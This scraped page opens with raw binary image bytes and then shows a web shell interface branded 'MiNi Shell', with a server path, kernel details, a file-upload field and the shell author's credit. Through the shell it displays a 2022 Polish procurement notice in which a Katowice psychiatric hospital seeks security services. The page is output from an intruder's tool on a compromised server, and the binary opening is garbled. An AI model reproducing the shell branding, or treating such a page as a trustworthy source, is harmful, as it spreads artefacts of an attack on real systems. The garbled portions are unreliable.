JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220926/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220926/0036374001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługi w zakresie ochrony osób i mienia szpitala. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">CENTRUM PSYCHIATRII W KATOWICACH IM. DR. KRZYSZTOFA CZUMY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276206986</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. dr Janusza Korczaka 27</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-340</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">48 32 603 84 00</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@centrumpsychiatrii.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.centrumpsychiatrii.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługi w zakresie ochrony osób i mienia szpitala. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9bd6182b-3346-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00363740</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00033680/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Usługi w zakresie ochrony osób i mienia szpitala.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/centrumpsychiatrii <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/centrumpsychiatrii</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający określił szczegółowo wszelkie dane w SWZ pkt.XIV od lit.A do lit.E oraz w pkt.XV.A. Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności w postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakładce &#34;Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje. Istnieje wymóg podpisu elektronicznego lub podpisu zaufanego lub podpisu osobistego.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje zawarto w SWZ pkt.XXVII</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacje zawarto w SWZ pkt.XXVII</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Oznaczenie sprawy : 01/US-OM/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest :<br/> A) Ochrona obiektów oraz mienia szpitala przed zaborem, kradzieżą i dewastacją znajdującego <br/> się w budynkach szpitalnych położonych przy ul. Korczaka 2, 22 i 27 w Katowicach, oraz na <br/> posesji szpitala i poza nią, poprzez dozorowanie.<br/> Zakres zamówienia obejmuje również ochronę fizyczną pracowników szpitala przed<br/> pacjentami przejawiającymi agresję wobec nich, oraz w stosunku do innych pacjentów<br/> i osób – z użyciem Grupy Interwencyjnej ( GI ) włącznie. Do obowiązków ochrony <br/> należy także zapewnienie ogólnego bezpieczeństwa personelowi szpitala, w tym także <br/> w sytuacjach kryzysowych ( np. alarm bombowy, terrorystyczny, pożar, ewakuacja <br/> itp.). W sytuacjach koniecznych zakres czynności obejmuje także udzielanie pomocy <br/> sanitarnej ( ratowniczej ). <br/> <br/> W skład obiektów wchodzi : <br/>•	portiernia główna przy bramie wjazdowej, ul. Korczaka 27 w Katowicach ; <br/>•	magazyn z garażem i stacją wymiennika ciepła obok portierni głównej, ul. Korczaka 27 ; <br/>•	budynek główny szpitala, ul. Korczaka 27 ;<br/>•	budynek administracyjno – biurowy wraz z poradnią zdrowia psychicznego przy ul.<br/>Korczaka 22 ( naprzeciw portierni głównej ) ;<br/>•	magazyn gospodarczy ( budynek byłego prosektorium ), ul.Korczaka 27 ;<br/>•	budynek techniczny ( agregat prądotwórczy, stacja transformatorowa ) poza ogrodzeniem posesji szpitala, w bezpośrednim sąsiedztwie, ul. Korczaka 27.<br/> B) Ochrona poprzez monitoring obiektu szpitala przy ul. Korczaka 2 w Katowicach, położonego po <br/> przeciwnej stronie drogi w odległości ok. 300 m od portierni głównej ( Poradnia i Oddział Terapii <br/> Uzależnienia i Współuzależnienia Od Alkoholu ), z uwzględnieniem doraźnych interwencji w <br/> przypadkach koniecznych ; <br/> C) Zabezpieczenie ruchu osobowo – towarowego w budynku głównym i na terenie posesji <br/> szpitala, w tym pobieranie opłat parkingowych z użyciem kasy fiskalnej.<br/> D) Podejmowanie doraźnych interwencji na wezwanie osób funkcyjnych pełniących dyżury ( lub <br/> osób upoważnionych ) i dyrekcji szpitala, z użyciem w razie potrzeby grupy interwencyjnej (GI). <br/> E) Obsługa centralki telefonicznej, w dni robocze w godzinach od 14:00 do 08:30, <br/> a w soboty, niedziele, święta oraz w dni ustawowo wolne od pracy całodobowo ( poprzez <br/> przekierunkowanie rozmów na żądane numery, z telefonu stacjonarnego znajdującego się <br/> w portierni głównej ).<br/> F) Odbieranie sygnałów z centralki sygnalizacji pożaru ( portiernia w budynku głównym ), <br/> sprawdzenie miejsca sygnalizowanego pożaru oraz kasowanie w odpowiednim czasie<br/> sygnału na centralce, w przypadku fałszywego alarmu.<br/> G) Patrolowanie i wykonywanie innych czynności mieszczących się w ramach ochrony. <br/> H) Wykonywanie zadań ochrony fizycznej i pozostałych czynności powinno odbywać się <br/> całodobowo :<br/>•	w godzinach od 07:00 do 19:00 w pięcioosobowej obsadzie personalnej ;<br/>•	w godzinach od 19:00 do 07:00 w czteroosobowej obsadzie personalnej.<br/> Pracownicy ochrony powinni być odpowiednio umundurowani i wyposażeni przez firmę w <br/> niezbędny sprzęt oraz powinni posiadać imienne identyfikatory.<br/> I) System monitoringu w obiekcie przy ul. Korczaka 2 powinien być włączany i wyłączany <br/> w okresie trwania umowy, w godzinach ustalonych przez Zamawiającego. <br/> J) Wykonawca na swój koszt ma zainstalować w budynku przy ul. Korczaka 2 w Katowicach system monitoringu, który stanowił będzie jego własność - minimum na 1 dzień przed rozpoczęciem świadczenia usług ochrony, z możliwością odbioru sygnału alarmowego w portierni przy ul. Korczaka 27 w Katowicach ( odległość ok. 300 m ),<br/>Wartość szacunkowa przedmiotu zamówienia – poniżej kwoty 750 000,00 euro </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79711000-1 - Usługi nadzoru przy użyciu alarmu</p> <p class="mb-0">79715000-9 - Usługi patrolowe</p> <p class="mb-0">79714000-2 - Usługi w zakresie nadzoru</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z zapisem w SWZ - pkt. XXI</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji grupy interwencyjnej (GI)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału dotyczą :<br/>a)	kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej <br/>(gospodarczej), o ile wynika to z odrębnych przepisów,<br/>b)	sytuacji ekonomicznej lub finansowej, <br/>c)	zdolności technicznej lub zawodowej,<br/>d)	dysponowania pracownikami posiadającymi kwalifikację ratowników medycznych,<br/>e)	możliwości zapewnienia Zamawiającemu odpisu z tytułu PFRON.<br/><br/> Wykonawca spełni warunki udziału w postępowaniu jeżeli wykaże, że :<br/><br/> ad.a – posiada aktualną koncesję MSW (MSWiA) w zakresie ochrony osób i mienia, zgodnie z <br/> przepisami ustawy obowiązującej w tym zakresie. <br/> ad.b – jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności <br/> związanej z przedmiotem zamówienia na sumę gwarancyjną ubezpieczenia minimum <br/> 3 000 000,00 zł.<br/> ad.c – wykonał lub wykonuje w okresie ostatnich 3 lat przed upływem terminu składania ofert, a <br/> jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 usługi <br/> dotyczące przedmiotu zamówienia, każda o wartości minimum 1 600 000,00 zł. brutto, w <br/> odniesieniu do obiektów użyteczności publicznej (w tym szczególnie podmiotów <br/> leczniczych),<br/> – posiada certyfikat ISO adekwatny do przedmiotu zamówienia.<br/> ad.d – w składzie osobowym przewidzianym do realizacji zmówienia dysponował będzie dwoma <br/> pracownikami posiadającymi uprawnienia ratowników medycznych,<br/> ad.e – zapewni Zamawiającemu odpis z tytułu PFRON w wysokości minimum 30 %<br/><br/>W odniesieniu do certyfikatu ISO, dla potwierdzenia przedmiotowego warunku wystarczającym będzie, w przypadku wspólnego ubiegania się o zamówienie jeśli wymagany certyfikat będzie posiada <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy :<br/>a)	nie podlegają wykluczeniu w okolicznościach, o których mowa w art. 108 ust.1 Pzp.,<br/>b)	spełniają warunki udziału w postępowaniu określone przez zamawiającego w ogłoszeniu o zamówieniu i SWZ.<br/>c)	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego, na podstawie ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 r.,poz.835), a w szczególności w odniesieniu do art.2 przedmiotowej ustawy, nie figurują na liście podmiotów ministra właściwego do spraw wewnętrznych, których wykluczenie z postępowania dotyczy na podstawie art.7 ust.1 przywołanej ustawy.<br/>Dokument : złożenie Oświadczenia ( art.125 ust.1 - załącznik nr 2 do SWZ)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Warunki udziału dotyczą :<br/>a)	kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej <br/>(gospodarczej), o ile wynika to z odrębnych przepisów,<br/>b)	sytuacji ekonomicznej lub finansowej, <br/>c)	zdolności technicznej lub zawodowej,<br/>d)	dysponowania pracownikami posiadającymi kwalifikację ratowników medycznych,<br/>e)	możliwości zapewnienia Zamawiającemu odpisu z tytułu PFRON.<br/><br/> Wykonawca spełni warunki udziału w postępowaniu jeżeli wykaże, że :<br/><br/> ad.a – posiada aktualną koncesję MSW (MSWiA) w zakresie ochrony osób i mienia, zgodnie z <br/> przepisami ustawy obowiązującej w tym zakresie. <br/> ad.b – jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności <br/> związanej z przedmiotem zamówienia na sumę gwarancyjną ubezpieczenia minimum <br/> 3 000 000,00 zł.<br/> ad.c – wykonał lub wykonuje w okresie ostatnich 3 lat przed upływem terminu składania ofert, a <br/> jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 usługi <br/> dotyczące przedmiotu zamówienia, każda o wartości minimum 1 600 000,00 zł. brutto, w <br/> odniesieniu do obiektów użyteczności publicznej (w tym szczególnie podmiotów <br/> leczniczych),<br/> – posiada certyfikat ISO adekwatny do przedmiotu zamówienia.<br/> ad.d – w składzie osobowym przewidzianym do realizacji zmówienia dysponował będzie dwoma <br/> pracownikami posiadającymi uprawnienia ratowników medycznych,<br/> ad.e – zapewni Zamawiającemu odpis z tytułu PFRON w wysokości minimum 30 %<br/><br/>W odniesieniu do certyfikatu ISO, dla potwierdzenia przedmiotowego warunku wystarczającym będzie, w przypadku wspólnego ubiegania się o zamówienie jeśli wymagany certyfikat będzie posiadał co najmniej jeden z konsorcjantów/wspólników, ten sam warunek dotyczy ratowników medycznych. <br/>Zamawiający żąda niżej wymienionych dokumentów :<br/><br/>1. Aktualna koncesja do świadczenia przedmiotowych usług.<br/>2. Dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w <br/> zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną <br/> określoną przez zamawiającego (polisa lub inny dokument ubezpieczenia).<br/>3.Wykaz usług potwierdzających, że Wykonawca wykonał lub wykonuje w okresie ostatnich 3 lat <br/> przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w <br/> tym okresie, co najmniej 2 usługi dotyczące przedmiotu zamówienia, każda o wartości minimum <br/> 1 600 000,00 zł. brutto, w odniesieniu do obiektów użyteczności publicznej (w tym szczególnie <br/> podmiotów leczniczych), Załącznik nr 4 do SWZ.<br/> 4. Certyfikat ISO.<br/> 5. Dokumenty dotyczące posiadania stosownych uprawnień przez ratowników medycznych.<br/> 6. Oświadczenie dotyczące gwarancji odpisu ulgi na PFRON, w wysokości minimum 30 %.<br/> 7. Informacja odpowiadająca odpisowi aktualnemu z KRS lub zaświadczenie o wpisie do <br/> odpowiedniego rejestru działalności gospodarczej.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 30 000,00 złotych <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zamawiający żąda złożenia wraz z ofertą Oświadczenia o braku podstaw wykluczenia z <br/> postępowania Wykonawcy składane na podstawie art. 125 ust. 1 ustawy z dnia 11 września 2019 <br/> r. - Prawo zamówień publicznych ( tekst jednolity Dz.U. z 2022 r. poz.1710, z późn. zm.) oraz <br/> spełnienia warunków udziału w postępowaniu – Załącznik nr 2 do SWZ. <br/> Uwaga: 1) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców ww. <br/> oświadczenie składa każdy z wykonawców.<br/> Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu, albo do <br/> reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo <br/> winno być załączone do oferty oraz Oświadczenie, z którego wynika jaki zakres <br/> przedmiotowej usługi będą realizować poszczególni Wykonawcy.<br/> 2)Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów <br/> udostępniających zasoby przedstawia także oświadczenie podmiotu udostępniającego <br/> zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu. - zgodnie z art.125 ust.5 <br/> ustawy Pzp. – Załącznik nr 2a do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Określone zostały w paragrafie 6 projektu umowy - Załącznik nr 3 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-06 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/centrumpsychiatrii</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-06 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com